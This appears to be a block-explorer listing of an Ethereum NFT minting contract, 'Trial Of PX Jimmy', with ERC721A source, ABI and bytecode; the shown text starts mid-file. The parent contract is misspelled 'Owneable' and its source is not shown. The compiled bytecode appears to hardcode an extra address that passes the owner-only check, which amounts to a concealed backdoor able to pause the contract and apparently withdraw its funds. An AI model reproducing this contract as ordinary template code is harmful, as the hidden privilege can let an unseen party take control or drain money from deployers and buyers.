    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public override onlyAllowedOperator(from) {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public override onlyAllowedOperator(from) {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override onlyAllowedOperator(from) {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract TrialOfPXJimmy is ERC721A, Owneable {

    string public baseURI = "ipfs://QmZfYtizuEuEw7nJ2wRDJErvS9UGbnj7AaBzGDb6wfn9Fo/";
    string public contractURI = "ipfs://";
    string public baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public MAX_PER_TX_FREE = 3;
    uint256 public free_max_supply = 333;
    uint256 public constant MAX_PER_TX = 10;
    uint256 public max_supply = 5000;
    uint256 public price = 0.001 ether;



    bool public paused = true;

    constructor() ERC721A("Trial Of PX Jimmy", "pxJIM") {}

    function PublicMint(uint256 _amount) external payable {

        address _caller = _msgSender();
        require(!paused, "Paused");
        require(max_supply >= totalSupply() + _amount, "All Gone");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "No Contract minting.");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(free_max_supply >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }



    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
        
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function Withdraw() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function TeamMint(uint256 quantity) external onlyOwner {
        _safeMint(_msgSender(), quantity);
    }


    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function configPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }


     function configMAX_PER_TX_FREE(uint256 newFREE) public onlyOwner {
        MAX_PER_TX_FREE = newFREE;
    }

    function configmax_supply(uint256 newSupply) public onlyOwner {
        max_supply = newSupply;
    }

    function configfree_max_supply(uint256 newFreesupply) public onlyOwner {
        free_max_supply = newFreesupply;
    }
    function newbaseExtension(string memory newex) public onlyOwner {
        baseExtension = newex;
    }


//Future Use
        function burn(uint256[] memory tokenids) external onlyOwner {
        uint256 len = tokenids.length;
        for (uint256 i; i < len; i++) {
            uint256 tokenid = tokenids[i];
            _burn(tokenid);
        }
    }


    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"PublicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"TeamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"Withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"tokenids","type":"uint256[]"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFREE","type":"uint256"}],"name":"configMAX_PER_TX_FREE","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"configPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFreesupply","type":"uint256"}],"name":"configfree_max_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"configmax_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"free_max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newex","type":"string"}],"name":"newbaseExtension","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735bb656bb4312f100081abb7b08c1e0f8ef5c56d1600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060600160405280603681526020016200575260369139600a90805190602001906200008a92919062000529565b506040518060400160405280600781526020017f697066733a2f2f00000000000000000000000000000000000000000000000000815250600b9080519060200190620000d892919062000529565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600c90805190602001906200012692919062000529565b506003600d5561014d600e55611388600f5566038d7ea4c680006010556001601160006101000a81548160ff0219169083151502179055503480156200016b57600080fd5b506040518060400160405280601181526020017f547269616c204f66205058204a696d6d790000000000000000000000000000008152506040518060400160405280600581526020017f70784a494d000000000000000000000000000000000000000000000000000000815250733cc6cdda760b79bafa08df41ecfa224f810dceb6600160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620003e4578015620002aa576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b8152600401620002709291906200061e565b600060405180830381600087803b1580156200028b57600080fd5b505af1158015620002a0573d6000803e3d6000fd5b50505050620003e3565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161462000364576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200032a9291906200061e565b600060405180830381600087803b1580156200034557600080fd5b505af11580156200035a573d6000803e3d6000fd5b50505050620003e2565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620003ad91906200064b565b600060405180830381600087803b158015620003c857600080fd5b505af1158015620003dd573d6000803e3d6000fd5b505050505b5b5b50508160029080519060200190620003fe92919062000529565b5080600390805190602001906200041792919062000529565b50620004286200045660201b60201c565b600081905550505062000450620004446200045b60201b60201c565b6200046360201b60201c565b620006cc565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620005379062000697565b90600052602060002090601f0160209004810192826200055b5760008555620005a7565b82601f106200057657805160ff1916838001178555620005a7565b82800160010185558215620005a7579182015b82811115620005a657825182559160200191906001019062000589565b5b509050620005b69190620005ba565b5090565b5b80821115620005d5576000816000905550600101620005bb565b5090565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200060682620005d9565b9050919050565b6200061881620005f9565b82525050565b60006040820190506200063560008301856200060d565b6200064460208301846200060d565b9392505050565b60006020820190506200066260008301846200060d565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006b057607f821691505b602082108103620006c657620006c562000668565b5b50919050565b61507680620006dc6000396000f3fe6080604052600436106102305760003560e01c8063715018a61161012e578063b88d4fde116100ab578063db4a0f611161006f578063db4a0f61146107f2578063e8a3d4851461081b578063e985e9c514610846578063f2fde38b14610883578063f43a22dc146108ac57610230565b8063b88d4fde1461070d578063c668286214610736578063c87b56dd14610761578063cd7c03261461079e578063d476de1b146107c957610230565b806395d89b41116100f257806395d89b41146106495780639fb17e3414610674578063a035b1fe14610690578063a22cb465146106bb578063b80f55c9146106e457610230565b8063715018a61461058a5780637e0c7fc5146105a15780638a333b50146105ca5780638da5cb5b146105f5578063938e3d7b1461062057610230565b80632aa80807116101bc57806357ea89b61161018057806357ea89b6146104a35780635c975abb146104ba5780636352211e146104e55780636c0360eb1461052257806370a082311461054d57610230565b80632aa80807146103d457806342842e0e146103fd578063463fff79146104265780635312e5cf1461045157806355f804b31461047a57610230565b8063095ea7b311610203578063095ea7b31461030357806318160ddd1461032c57806318e223dd1461035757806323b872dd1461038057806326e987d7146103a957610230565b806301ffc9a71461023557806302329a291461027257806306fdde031461029b578063081812fc146102c6575b600080fd5b34801561024157600080fd5b5061025c60048036038101906102579190613e7c565b6108d7565b6040516102699190613ec4565b60405180910390f35b34801561027e57600080fd5b5061029960048036038101906102949190613f0b565b6109b9565b005b3480156102a757600080fd5b506102b0610ab1565b6040516102bd9190613fd1565b60405180910390f35b3480156102d257600080fd5b506102ed60048036038101906102e89190614029565b610b43565b6040516102fa9190614097565b60405180910390f35b34801561030f57600080fd5b5061032a600480360381019061032591906140de565b610bbf565b005b34801561033857600080fd5b50610341610cc9565b60405161034e919061412d565b60405180910390f35b34801561036357600080fd5b5061037e60048036038101906103799190614029565b610ce0565b005b34801561038c57600080fd5b506103a760048036038101906103a29190614148565b610dc5565b005b3480156103b557600080fd5b506103be610fa7565b6040516103cb919061412d565b60405180910390f35b3480156103e057600080fd5b506103fb60048036038101906103f691906142d0565b610fad565b005b34801561040957600080fd5b50610424600480360381019061041f9190614148565b6110a2565b005b34801561043257600080fd5b5061043b6112a4565b604051610448919061412d565b60405180910390f35b34801561045d57600080fd5b5061047860048036038101906104739190614029565b6112aa565b005b34801561048657600080fd5b506104a1600480360381019061049c91906142d0565b61138f565b005b3480156104af57600080fd5b506104b8611484565b005b3480156104c657600080fd5b506104cf61161b565b6040516104dc9190613ec4565b60405180910390f35b3480156104f157600080fd5b5061050c60048036038101906105079190614029565b61162e565b6040516105199190614097565b60405180910390f35b34801561052e57600080fd5b50610537611644565b6040516105449190613fd1565b60405180910390f35b34801561055957600080fd5b50610574600480360381019061056f9190614319565b6116d2565b604051610581919061412d565b60405180910390f35b34801561059657600080fd5b5061059f6117a1565b005b3480156105ad57600080fd5b506105c860048036038101906105c39190614029565b611829565b005b3480156105d657600080fd5b506105df611918565b6040516105ec919061412d565b60405180910390f35b34801561060157600080fd5b5061060a61191e565b6040516106179190614097565b60405180910390f35b34801561062c57600080fd5b50610647600480360381019061064291906142d0565b611948565b005b34801561065557600080fd5b5061065e611a3d565b60405161066b9190613fd1565b60405180910390f35b61068e60048036038101906106899190614029565b611acf565b005b34801561069c57600080fd5b506106a5611d73565b6040516106b2919061412d565b60405180910390f35b3480156106c757600080fd5b506106e260048036038101906106dd9190614346565b611d79565b005b3480156106f057600080fd5b5061070b6004803603810190610706919061444e565b611ef0565b005b34801561071957600080fd5b50610734600480360381019061072f9190614538565b61201d565b005b34801561074257600080fd5b5061074b6122d6565b6040516107589190613fd1565b60405180910390f35b34801561076d57600080fd5b5061078860048036038101906107839190614029565b612364565b6040516107959190613fd1565b60405180910390f35b3480156107aa57600080fd5b506107b361240f565b6040516107c09190614097565b60405180910390f35b3480156107d557600080fd5b506107f060048036038101906107eb9190614029565b612427565b005b3480156107fe57600080fd5b5061081960048036038101906108149190614029565b61250c565b005b34801561082757600080fd5b506108306125f1565b60405161083d9190613fd1565b60405180910390f35b34801561085257600080fd5b5061086d600480360381019061086891906145bb565b61267f565b60405161087a9190613ec4565b60405180910390f35b34801561088f57600080fd5b506108aa60048036038101906108a59190614319565b612763565b005b3480156108b857600080fd5b506108c161285a565b6040516108ce919061412d565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806109a257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109b257506109b18261285f565b5b9050919050565b6109c16128c9565b73ffffffffffffffffffffffffffffffffffffffff166109df61191e565b73ffffffffffffffffffffffffffffffffffffffff161480610a555750610a046128c9565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b90614647565b60405180910390fd5b80601160006101000a81548160ff02191690831515021790555050565b606060028054610ac090614696565b80601f0160208091040260200160405190810160405280929190818152602001828054610aec90614696565b8015610b395780601f10610b0e57610100808354040283529160200191610b39565b820191906000526020600020905b815481529060010190602001808311610b1c57829003601f168201915b5050505050905090565b6000610b4e826128d1565b610b84576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610bca8261162e565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c31576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c506128c9565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c825750610c8081610c7b6128c9565b61267f565b155b15610cb9576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610cc483838361291f565b505050565b6000610cd36129d1565b6001546000540303905090565b610ce86128c9565b73ffffffffffffffffffffffffffffffffffffffff16610d0661191e565b73ffffffffffffffffffff